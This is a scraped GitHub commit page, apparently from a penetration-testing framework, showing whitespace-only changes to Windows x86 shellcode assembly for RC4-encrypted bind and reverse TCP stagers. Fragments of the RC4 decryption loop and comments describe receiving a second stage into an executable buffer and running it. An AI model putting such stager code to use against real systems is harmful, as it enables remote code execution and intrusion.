File tree Expand file tree Collapse file tree 4 files changed +6
-6
lines changed
external/source/shellcode/windows/x86/src Expand file tree Collapse file tree 4 files changed +6
-6
lines changed Original file line number Diff line number Diff line change 19
19
inc al ; increase byte to write (EDI is increased automatically)
20
20
jnz init ; loop until we wrap around
21
21
sub edi , 0x100 ; restore EDI
22
-
22
+
23
23
; permute S-box according to key
24
24
xor ebx , ebx ; Clear EBX (EAX is already cleared)
25
25
permute:
@@ -32,8 +32,8 @@ permute:
32
32
mov [ edi + eax ], dl
33
33
inc al ; AL += 1 until we wrap around
34
34
jnz permute
35
-
36
-
35
+
36
+
37
37
; decryption loop
38
38
xor ebx , ebx ; Clear EBX (EAX is already cleared)
39
39
decrypt:
Original file line number Diff line number Diff line change @@ -17,4 +17,4 @@ start: ;
17
17
%include "./src/block/block_bind_tcp.asm"
18
18
; By here we will have performed the bind_tcp connection and EDI will be our socket.
19
19
%include "./src/block/block_recv_rc4.asm"
20
- ; By now we will have received in the second stage into a RWX buffer and be executing it
20
+ ; By now we will have received in the second stage into a RWX buffer and be executing it
Original file line number Diff line number Diff line change @@ -18,4 +18,4 @@ start: ;
18
18
%include "./src/block/block_reverse_tcp.asm"
19
19
; By here we will have performed the reverse_tcp connection and EDI will be our socket.
20
20
%include "./src/block/block_recv_rc4.asm"
21
- ; By now we will have recieved in the second stage into a RWX buffer and be executing it
21
+ ; By now we will have recieved in the second stage into a RWX buffer and be executing it
Original file line number Diff line number Diff line change 8
8
; c1.encrypt
9
9
; c1.key="Hello, my world!"
10
10
; c1.update("This is some magic data you may want to have encoded and decoded again").unpack("H*")
11
- ;
11
+ ;
12
12
; => "882353c5de0f5e6b10bf0d25c432c5d16424dc797e895f37f261c893b31d577e7e69f77e07aa576d58c7f757164e7d74988feb10f972b28dcfa1e3a2b1cc0b0fa1a8b116294b"
13
13
;
14
14
; c1 = OpenSSL::Cipher::Cipher.new('RC4')
You can’t perform that action at this time.
0 commit comments